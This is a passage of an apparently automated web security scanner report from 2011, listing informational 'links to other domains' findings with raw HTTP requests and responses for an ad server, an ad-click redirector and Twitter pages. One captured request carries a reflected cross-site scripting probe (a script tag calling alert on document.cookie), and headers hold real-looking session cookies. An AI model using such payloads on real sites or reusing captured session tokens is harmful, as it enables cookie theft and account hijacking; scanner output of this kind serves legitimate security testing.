GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2094
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Fri, 28 Jan 2011 17:37:49 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,513102,,,TOT09,RCQU1,RCQU9,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME>
...[SNIP]...
<noscr'+'ipt><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=TOT09%2cRCQU1%2cRCQU9&cv=2.0&cj=1" /></noscr'+'ipt>
...[SNIP]...
<div style="display:none;width:0;height:0"><img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_cntxtweb" height="1" width="1" /><img src="http://idpix.media6degrees.com/orbserv/hbpix?pixId=5392" height="1" width="1" /><img src="http://tags.bluekai.com/site/3358?id=gFEcJzqCjXJj" height="1" width="1" /><img src="http://map.pulsemgr.com/uds/pc?ptnr=21272" height="1" width="1" /><img src="http://sync.mathtag.com/sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D" height="1" width="1" /></div>
...[SNIP]...

17.253. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The page was loaded from a URL containing a query string:

http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt?FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64?trg=http://www.mylife.com/privacy-policy&siteValue=0000766161\

The response contains the following link to another domain:

http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e&FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161%5E935955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64&trg=http://www.mylife.com/privacy-policy&siteValue=0000766161%5C

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt?FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64?trg=http://www.mylife.com/privacy-policy&siteValue=0000766161\ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:08 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e&FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161%5E935955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64&trg=http://www.mylife.com/privacy-policy&siteValue=0000766161%5C
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 527
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e&FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161%5E935955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64&trg=http://www.mylife.com/privacy-policy&siteValue=0000766161%5C">here</a>
...[SNIP]...

17.254. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/?status=@

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/profile_images/1210515005/image_normal.jpg
http://a0.twimg.com/profile_images/129730596/2630509441_944a6ee3e2_m_normal.jpg
http://a0.twimg.com/profile_images/379256380/IMG_0913_normal.JPG
http://a0.twimg.com/profile_images/648882151/app_1_4066274025_8743_normal.gif
http://a0.twimg.com/profile_images/67263363/icon.cnnbrk_normal.png
http://a0.twimg.com/profile_images/951933826/Seth_SP-7004_normal.jpg
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903
http://a1.twimg.com/profile_images/1162063666/health_news_100x100_normal.jpg
http://a1.twimg.com/profile_images/1196735481/230210193_normal.jpg
http://a1.twimg.com/profile_images/1214676495/4139926546_b76396d581_o_normal.jpg
http://a1.twimg.com/profile_images/295295346/avatar-squared_logo_normal.gif
http://a1.twimg.com/profile_images/64445726/rb_normal.jpg
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903
http://a2.twimg.com/profile_images/1167802841/phdinpareting-twitter-avatar2_normal.jpg
http://a2.twimg.com/profile_images/1217688159/twitter-avatar_normal.jpg
http://a2.twimg.com/profile_images/289110813/fashion_75_twitter_normal.gif
http://a2.twimg.com/profile_images/471198711/a_rasterized_500w_normal.jpg
http://a2.twimg.com/profile_images/490621106/Picture_2_normal.png
http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg
http://a2.twimg.com/profile_images/647531397/dick_profile_normal.png
http://a3.twimg.com/profile_images/1162062705/gourmet100x100_normal.jpg
http://a3.twimg.com/profile_images/642528874/WDvert_color_normal.png
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234370-70445-11207
ETag: "8b22de7001b884f0909653bbc0878c1b"
Last-Modified: Fri, 28 Jan 2011 17:06:10 GMT
X-Runtime: 0.07086
Content-Type: text/html; charset=utf-8
Content-Length: 45097
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
<a href="/WorktoLive" class="avatar-sm" hreflang="en" id="icon_WorktoLive" rel="WorktoLive" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/490621106/Picture_2_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WorktoLive" class="avatar" hreflang="en" target="_blank"><img alt="WorktoLive" border="0" height="48" src="http://a2.twimg.com/profile_images/490621106/Picture_2_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/JetBlueCheeps" class="avatar-sm" hreflang="en" id="icon_JetBlueCheeps" rel="JetBlueCheeps" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/295295346/avatar-squared_logo_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/JetBlueCheeps" class="avatar" hreflang="en" target="_blank"><img alt="JetBlueCheeps" border="0" height="48" src="http://a1.twimg.com/profile_images/295295346/avatar-squared_logo_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dailygalaxy" class="avatar-sm" hreflang="en" id="icon_dailygalaxy" rel="dailygalaxy" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/648882151/app_1_4066274025_8743_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dailygalaxy" class="avatar" hreflang="en" target="_blank"><img alt="dailygalaxy" border="0" height="48" src="http://a0.twimg.com/profile_images/648882151/app_1_4066274025_8743_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/sebastianbach" class="avatar-sm" hreflang="en" id="icon_sebastianbach" rel="sebastianbach" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1214676495/4139926546_b76396d581_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/sebastianbach" class="avatar" hreflang="en" target="_blank"><img alt="sebastianbach" border="0" height="48" src="http://a1.twimg.com/profile_images/1214676495/4139926546_b76396d581_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/funnyordie" class="avatar-sm" hreflang="en" id="icon_funnyordie" rel="funnyordie" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1217688159/twitter-avatar_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/funnyordie" class="avatar" hreflang="en" target="_blank"><img alt="funnyordie" border="0" height="48" src="http://a2.twimg.com/profile_images/1217688159/twitter-avatar_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/fledgling" class="avatar-sm" hreflang="en" id="icon_fledgling" rel="fledgling" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/471198711/a_rasterized_500w_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/fledgling" class="avatar" hreflang="en" target="_blank"><img alt="fledgling" border="0" height="48" src="http://a2.twimg.com/profile_images/471198711/a_rasterized_500w_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/umairh" class="avatar-sm" hreflang="en" id="icon_umairh" rel="umairh" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/129730596/2630509441_944a6ee3e2_m_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/umairh" class="avatar" hreflang="en" target="_blank"><img alt="umairh" border="0" height="48" src="http://a0.twimg.com/profile_images/129730596/2630509441_944a6ee3e2_m_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/richardbranson" class="avatar-sm" hreflang="en" id="icon_richardbranson" rel="richardbranson" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/64445726/rb_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/richardbranson" class="avatar" hreflang="en" target="_blank"><img alt="richardbranson" border="0" height="48" src="http://a1.twimg.com/profile_images/64445726/rb_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/thesulk" class="avatar-sm" hreflang="en" id="icon_thesulk" rel="thesulk" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/379256380/IMG_0913_normal.JPG" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/thesulk" class="avatar" hreflang="en" target="_blank"><img alt="thesulk" border="0" height="48" src="http://a0.twimg.com/profile_images/379256380/IMG_0913_normal.JPG" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dickc" class="avatar-sm" hreflang="en" id="icon_dickc" rel="dickc" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/647531397/dick_profile_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dickc" class="avatar" hreflang="en" target="_blank"><img alt="dickc" border="0" height="48" src="http://a2.twimg.com/profile_images/647531397/dick_profile_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/nytimesfashion" class="avatar-sm" hreflang="en" id="icon_nytimesfashion" rel="nytimesfashion" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/289110813/fashion_75_twitter_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/nytimesfashion" class="avatar" hreflang="en" target="_blank"><img alt="nytimesfashion" border="0" height="48" src="http://a2.twimg.com/profile_images/289110813/fashion_75_twitter_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/cnnbrk" class="avatar-sm" hreflang="en" id="icon_cnnbrk" rel="cnnbrk" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/67263363/icon.cnnbrk_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/cnnbrk" class="avatar" hreflang="en" target="_blank"><img alt="cnnbrk" border="0" height="48" src="http://a0.twimg.com/profile_images/67263363/icon.cnnbrk_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/frugaltraveler" class="avatar-sm" hreflang="en" id="icon_frugaltraveler" rel="frugaltraveler" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/951933826/Seth_SP-7004_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/frugaltraveler" class="avatar" hreflang="en" target="_blank"><img alt="frugaltraveler" border="0" height="48" src="http://a0.twimg.com/profile_images/951933826/Seth_SP-7004_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WritersDigest" class="avatar-sm" hreflang="en" id="icon_WritersDigest" rel="WritersDigest" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/642528874/WDvert_color_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WritersDigest" class="avatar" hreflang="en" target="_blank"><img alt="WritersDigest" border="0" height="48" src="http://a3.twimg.com/profile_images/642528874/WDvert_color_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/RealKaka" class="avatar-sm" hreflang="en" id="icon_RealKaka" rel="RealKaka" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1196735481/230210193_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/RealKaka" class="avatar" hreflang="en" target="_blank"><img alt="RealKaka" border="0" height="48" src="http://a1.twimg.com/profile_images/1196735481/230210193_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/gourmet" class="avatar-sm" hreflang="en" id="icon_gourmet" rel="gourmet" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1162062705/gourmet100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/gourmet" class="avatar" hreflang="en" target="_blank"><img alt="gourmet" border="0" height="48" src="http://a3.twimg.com/profile_images/1162062705/gourmet100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/health" class="avatar-sm" hreflang="en" id="icon_health" rel="health" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1162063666/health_news_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/health" class="avatar" hreflang="en" target="_blank"><img alt="health" border="0" height="48" src="http://a1.twimg.com/profile_images/1162063666/health_news_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/phdinparenting" class="avatar-sm" hreflang="en" id="icon_phdinparenting" rel="phdinparenting" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1167802841/phdinpareting-twitter-avatar2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/phdinparenting" class="avatar" hreflang="en" target="_blank"><img alt="phdinparenting" border="0" height="48" src="http://a2.twimg.com/profile_images/1167802841/phdinpareting-twitter-avatar2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar-sm" hreflang="en" id="icon_jdickerson" rel="jdickerson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar" hreflang="en" target="_blank"><img alt="jdickerson" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Pro_Hunt58" class="avatar-sm" hreflang="en" id="icon_Pro_Hunt58" rel="Pro_Hunt58" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/1210515005/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Pro_Hunt58" class="avatar" hreflang="en" target="_blank"><img alt="Pro_Hunt58" border="0" height="48" src="http://a0.twimg.com/profile_images/1210515005/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.255. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/malsup?max_id=30791740717801472&page=2&twttr=true

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/loader.gif
http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg
http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg
http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg
http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg
http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg
http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg
http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg
http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg
http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg
http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png
http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a1.twimg.com/a/1296179758/stylesheets/following.css?1296182306
http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg
http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg
http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg
http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png
http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png
http://a1.twimg.com/profile_images/1164188883/support_mini.png
http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg
http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg
http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png
http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg
http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg
http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg
http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a2.twimg.com/a/1296179758/stylesheets/geo.css?1296182306
http://a2.twimg.com/a/1296179758/stylesheets/twitter.css?1296182306
http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png
http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg
http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg
http://a2.twimg.com/profile_images/156932880/fro_mini.png
http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg
http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png
http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg
http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg
http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png
http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg
http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://a3.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296182306
http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg
http://a3.twimg.com/profile_images/47266842/me2_mini.JPG
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://bit.ly/a90m3b
http://itunes.apple.com/us/app/twitter/id409789998?mt=12
http://t.co/7uqdg3u
http://t.co/djfgFrh
http://www.google.com/jsapi

Request

GET /malsup?max_id=30791740717801472&page=2&twttr=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
